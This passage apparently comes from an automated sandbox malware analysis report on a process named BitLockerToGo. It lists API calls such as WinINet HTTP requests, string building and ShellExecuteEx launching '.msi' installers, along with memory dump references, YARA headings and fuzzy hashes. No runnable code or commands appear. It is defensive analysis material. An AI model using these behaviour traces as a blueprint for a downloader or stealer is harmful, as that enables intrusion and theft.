                                                                                                                                                                  • Part of subcall function 03009AC0: LocalFree.KERNEL32(?,?,?,?,03004EEE,00000000,?), ref: 03009B3F
                                                                                                                                                                  • Part of subcall function 03009E10: memcmp.MSVCRT(?,v20,00000003), ref: 03009E2D
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 030144A3
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,030208D1), ref: 030144C0
                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 030144D2
                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 030144E5
                                                                                                                                                                • lstrcat.KERNEL32(00000000,03020FB8), ref: 030144F4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1191620704-0
                                                                                                                                                                • Opcode ID: a2c108526ba0b180b8ccab11d08cf59ebd397d9ccb7468ac0693f778ef529d01
                                                                                                                                                                • Instruction ID: 16bdb0e6edc21c73ce52a50589a98ff4fea58489f5f1120440d8376d58f63fe5
                                                                                                                                                                • Opcode Fuzzy Hash: a2c108526ba0b180b8ccab11d08cf59ebd397d9ccb7468ac0693f778ef529d01
                                                                                                                                                                • Instruction Fuzzy Hash: E67146BA901308ABDB14FBE0EC89FDE7779AB88300F048598E6059B185EB34D755CB91
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                  • Part of subcall function 03006280: InternetOpenA.WININET(03020DFE,00000001,00000000,00000000,00000000), ref: 030062E1
                                                                                                                                                                  • Part of subcall function 03006280: StrCmpCA.SHLWAPI(?,03554CA0), ref: 03006303
                                                                                                                                                                  • Part of subcall function 03006280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 03006335
                                                                                                                                                                  • Part of subcall function 03006280: HttpOpenRequestA.WININET(00000000,GET,?,03556390,00000000,00000000,00400100,00000000), ref: 03006385
                                                                                                                                                                  • Part of subcall function 03006280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 030063BF
                                                                                                                                                                  • Part of subcall function 03006280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 030063D1
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 03015318
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0301532F
                                                                                                                                                                  • Part of subcall function 03018E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 03018E52
                                                                                                                                                                • StrStrA.SHLWAPI(00000000,00000000), ref: 03015364
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 03015383
                                                                                                                                                                • strtok.MSVCRT(00000000,?), ref: 0301539E
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 030153AE
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                                                                                                                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                • API String ID: 3532888709-1526165396
                                                                                                                                                                • Opcode ID: 786b13f9800fee490f179c84f71a16e3e1ed73ed89b3f8c630e12825f724e2f7
                                                                                                                                                                • Instruction ID: 72ffd90a049d78a45120bf4038b693f6e6500e2c6d1d1c0567fa975df21c39c3
                                                                                                                                                                • Opcode Fuzzy Hash: 786b13f9800fee490f179c84f71a16e3e1ed73ed89b3f8c630e12825f724e2f7
                                                                                                                                                                • Instruction Fuzzy Hash: BF511E38A13248DBDB18FF60DE95AEE7779AF90311F504018E8065F590EF746B1ACBA1
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6CCB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC84A68), ref: 6CCB945E
                                                                                                                                                                  • Part of subcall function 6CCB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCB9470
                                                                                                                                                                  • Part of subcall function 6CCB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCB9482
                                                                                                                                                                  • Part of subcall function 6CCB9420: __Init_thread_footer.LIBCMT ref: 6CCB949F
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCBEC84
                                                                                                                                                                • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCBEC8C
                                                                                                                                                                  • Part of subcall function 6CCB94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CCB94EE
                                                                                                                                                                  • Part of subcall function 6CCB94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CCB9508
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCBECA1
                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(6CCFF4B8), ref: 6CCBECAE
                                                                                                                                                                • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6CCBECC5
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(6CCFF4B8), ref: 6CCBED0A
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CCBED19
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 6CCBED28
                                                                                                                                                                • free.MOZGLUE(00000000), ref: 6CCBED2F
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(6CCFF4B8), ref: 6CCBED59
                                                                                                                                                                Strings
                                                                                                                                                                • [I %d/%d] profiler_ensure_started, xrefs: 6CCBEC94
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                • API String ID: 4057186437-125001283
                                                                                                                                                                • Opcode ID: 068afbfc8764832002052db5f1de0b7bbbd2b8c97a49b74ce1f79cf8e16ccc44
                                                                                                                                                                • Instruction ID: 7dcd18c6c4371cfdae22c9a284be72e662924c42e34d081340532fc9a6993b4a
                                                                                                                                                                • Opcode Fuzzy Hash: 068afbfc8764832002052db5f1de0b7bbbd2b8c97a49b74ce1f79cf8e16ccc44
                                                                                                                                                                • Instruction Fuzzy Hash: 4C21D375600108AFDB009FA4E804B9A7BB9EF4666CF104255FD29A7B41FB759806CBB1
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6CC7EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC7EB83
                                                                                                                                                                • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6CCBB392,?,?,00000001), ref: 6CCB91F4
                                                                                                                                                                  • Part of subcall function 6CCACBE8: GetCurrentProcess.KERNEL32(?,6CC731A7), ref: 6CCACBF1
                                                                                                                                                                  • Part of subcall function 6CCACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC731A7), ref: 6CCACBFA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                                                                                                • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                                                                                                • API String ID: 3790164461-3347204862
                                                                                                                                                                • Opcode ID: 20864258217f2b662991c66906b49d63049bd26b5ce3a960331a891ac706d3ec
                                                                                                                                                                • Instruction ID: 7a148c122213a49125cd3a5d542d03a7728720055c9f320075b3620f3cc9cc64
                                                                                                                                                                • Opcode Fuzzy Hash: 20864258217f2b662991c66906b49d63049bd26b5ce3a960331a891ac706d3ec
                                                                                                                                                                • Instruction Fuzzy Hash: 66B1B2B1A012099BDB04CF99C892BEEBBB5FF89348F104029D515ABF90F7319945CBE1
                                                                                                                                                                APIs
                                                                                                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC9C5A3
                                                                                                                                                                • WideCharToMultiByte.KERNEL32 ref: 6CC9C9EA
                                                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CC9C9FB
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6CC9CA12
                                                                                                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CC9CA2E
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC9CAA5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                                                                                • String ID: (null)$0
                                                                                                                                                                • API String ID: 4074790623-38302674
                                                                                                                                                                • Opcode ID: fb440ac8e9dcb428738d36a054d1a6fabecafc1030bd2e388c9bbd2aa1a80c54
                                                                                                                                                                • Instruction ID: 2a2451d7bd522a21168397d9d32f2dd4085102e88ec4143d0086db5cbe8762f1
                                                                                                                                                                • Opcode Fuzzy Hash: fb440ac8e9dcb428738d36a054d1a6fabecafc1030bd2e388c9bbd2aa1a80c54
                                                                                                                                                                • Instruction Fuzzy Hash: 74A1AC316083429FDB00DF29C59475ABBF5BF8A748F04892DE999D7641EB31EC05CB92
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CC73284,?,?,6CC956F6), ref: 6CC73492
                                                                                                                                                                • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CC73284,?,?,6CC956F6), ref: 6CC734A9
                                                                                                                                                                • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CC73284,?,?,6CC956F6), ref: 6CC734EF
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CC7350E
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 6CC73522
                                                                                                                                                                • __aulldiv.LIBCMT ref: 6CC73552
                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CC73284,?,?,6CC956F6), ref: 6CC7357C
                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CC73284,?,?,6CC956F6), ref: 6CC73592
                                                                                                                                                                  • Part of subcall function 6CCAAB89: EnterCriticalSection.KERNEL32(6CCFE370,?,?,?,6CC734DE,6CCFF6CC,?,?,?,?,?,?,?,6CC73284), ref: 6CCAAB94
                                                                                                                                                                  • Part of subcall function 6CCAAB89: LeaveCriticalSection.KERNEL32(6CCFE370,?,6CC734DE,6CCFF6CC,?,?,?,?,?,?,?,6CC73284,?,?,6CC956F6), ref: 6CCAABD1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                • API String ID: 3634367004-706389432
                                                                                                                                                                • Opcode ID: c1b1b68a8d90b23094eaf55f496cb83de925eccb5f3f20e05297f4c42eb63f18
                                                                                                                                                                • Instruction ID: 9d404e0669de8ca4b6d3e41de3c8c9ca651f2fe3d5e750050d095004ffc8b929
                                                                                                                                                                • Opcode Fuzzy Hash: c1b1b68a8d90b23094eaf55f496cb83de925eccb5f3f20e05297f4c42eb63f18
                                                                                                                                                                • Instruction Fuzzy Hash: D3319C71B0020AAFDF14DFB9E868AAE77B9FF46305F144019E521A3650EB70A905CB61
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$moz_xmalloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3009372454-0
                                                                                                                                                                • Opcode ID: e7b30e752b06cee131c9aeb7a0000d23cae51305dae490c1578c2312b3ce39c5
                                                                                                                                                                • Instruction ID: c4b751d8485232da77c5a2ca5e02bf233704e00be7f384abdf727287d2299eb1
                                                                                                                                                                • Opcode Fuzzy Hash: e7b30e752b06cee131c9aeb7a0000d23cae51305dae490c1578c2312b3ce39c5
                                                                                                                                                                • Instruction Fuzzy Hash: A9B1D071A005148FDB28CF3CD8A076D76A6EF46328F184669E426DBB92F735D840CFA1
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1192971331-0
                                                                                                                                                                • Opcode ID: 417ec8c448a4e3fb8df260cfe1f9afdff9a7bbc88a19cde2ccf50316c7a1feb8
                                                                                                                                                                • Instruction ID: 1b286f4ead16ad1d8c28de9c718b7fea1a1e9e1c79ac1e2126b8a4e6acbd39d8
                                                                                                                                                                • Opcode Fuzzy Hash: 417ec8c448a4e3fb8df260cfe1f9afdff9a7bbc88a19cde2ccf50316c7a1feb8
                                                                                                                                                                • Instruction Fuzzy Hash: 6C3162B1A047058FDB00EF7DD64826EBBF0FF85305F02492DE99997211EB709448CB82
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 030131C5
                                                                                                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 0301335D
                                                                                                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 030134EA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExecuteShell$lstrcpy
                                                                                                                                                                • String ID: /i "$ /passive$"" $.dll$.msi$<
                                                                                                                                                                • API String ID: 2507796910-1961616256
                                                                                                                                                                • Opcode ID: 86347035ed523454c32125faf048756e32449528e352aea8c395a320f9a87591
                                                                                                                                                                • Instruction ID: 4042a0db5fb26130fd9059bababbc6c6525f72979185508cfda9194d57382f53
                                                                                                                                                                • Opcode Fuzzy Hash: 86347035ed523454c32125faf048756e32449528e352aea8c395a320f9a87591
                                                                                                                                                                • Instruction Fuzzy Hash: D8122F799032089BDB09FBA0DD91FDEB738AF94310F404159E5066A190EF746B9ECFA0
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(6CCFE784), ref: 6CC71EC1
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6CCFE784), ref: 6CC71EE1
                                                                                                                                                                • EnterCriticalSection.KERNEL32(6CCFE744), ref: 6CC71F38
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6CCFE744), ref: 6CC71F5C
                                                                                                                                                                • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6CC71F83
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6CCFE784), ref: 6CC71FC0
                                                                                                                                                                • EnterCriticalSection.KERNEL32(6CCFE784), ref: 6CC71FE2
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6CCFE784), ref: 6CC71FF6
                                                                                                                                                                • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC72019
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                                                                                                • String ID: MOZ_CRASH()
                                                                                                                                                                • API String ID: 2055633661-2608361144
